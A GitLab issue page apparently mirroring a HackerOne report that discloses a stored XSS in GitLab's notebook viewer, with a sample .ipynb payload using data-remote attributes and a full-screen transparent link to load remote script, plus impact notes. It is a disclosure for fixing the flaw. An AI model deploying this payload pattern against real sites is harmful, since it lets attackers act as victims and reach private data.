Skip to content
GitLab
Next
    • GitLab: the DevOps platform
    • Explore GitLab
    • Install GitLab
    • How GitLab compares
    • Get started
    • GitLab docs
    • GitLab Learn
  • Pricing
  • Talk to an expert
  • /
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
    Projects Groups Topics Snippets
  • Register
  • Sign in
  • GitLab GitLab
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributor statistics
    • Graph
    • Compare revisions
    • Locked files
  • Issues 54.9k
    • Issues 54.9k
    • List
    • Boards
    • Service Desk
    • Milestones
    • Iterations
    • Requirements
  • Merge requests 1.5k
    • Merge requests 1.5k
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Artifacts
    • Schedules
    • Test cases
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Packages and registries
    • Packages and registries
    • Package Registry
    • Container Registry
    • Terraform modules
    • Model experiments
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Code review
    • Insights
    • Issue
    • Repository
  • Snippets
    • Snippets
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • GitLab.orgGitLab.org
  • GitLabGitLab
  • Issues
  • #294128
Closed
Open
Issue created Dec 16, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

XSS on the blob viewer of notebooks

HackerOne report #1060114 by yvvdwf on 2020-12-16, assigned to @ankelly:

Report | How To Reproduce

Report

Hello,

Gitlab recently uses Dompurify to sanitize data. Dompurify allows data-* attributes by default. When using data-* attributes with the presence of rails-ujs, attackers might trick victims to execute any javascript.

The following attack scenario triggers an alert when you click anywhere on the blob viewer screen of notebooks. Since gitlab allows sending API requests via Javascript in Web browsers, attackers may perform arbitrary actions on behalf of victims, such as, escalate permissions, access to private objects, etc.

Steps to reproduce
  1. In a project, create a file xss.ipynb with the following content (note edited with a known safe payload):
{
 "cells": [  
  {  
   "cell_type": "markdown",  
   "source": [  
        "<a data-type=script data-remote=true href='https://gitlab.com/ankelly/pipeline_payload/-/jobs/[REDACTED]/artifacts/raw/data/alert.js' style='position:fixed;z-index:9999;top:0;left:0;right:0;bottom:0'></a>CLICK ANYWHERE TO SHOW POPUP"  
   ]  
  }]  
}
  1. When viewing this file, you might notice that there exists a transparent layer that is on the topmost. This layer intercepts any event clicks. Once you click anywhere you should see a popup.
Impact

Once victims click anywhere on the screen of notebook viewer, attackers might execute their javascript. Since gitlab allows sending API requests via Javascript in Web browsers, attackers may perform arbitrary actions on behalf of victims, such as, escalate permissions, access to private objects, etc.

Examples

https://gitlab.com/yvvdwf/notebook/-/blob/master/xss.ipynb

What is the current bug behavior?

data-* attributes are not removed when sanitizing.

What is the expected correct behavior?

data-* attributes should be removed when sanitizing.

Output of checks

This bug happens on GitLab.com

Impact

Once victims click anywhere on the screen of notebook viewer, attackers might execute their javascript. Since gitlab allows sending API requests via Javascript in Web browsers, attackers may perform arbitrary actions on behalf of victims, such as, escalate permissions, access to private objects, etc.

How To Reproduce

Please add reproducibility information to this section:

Edited Jul 07, 2022 by Costel Maxim
Assignee
Assign to
Time tracking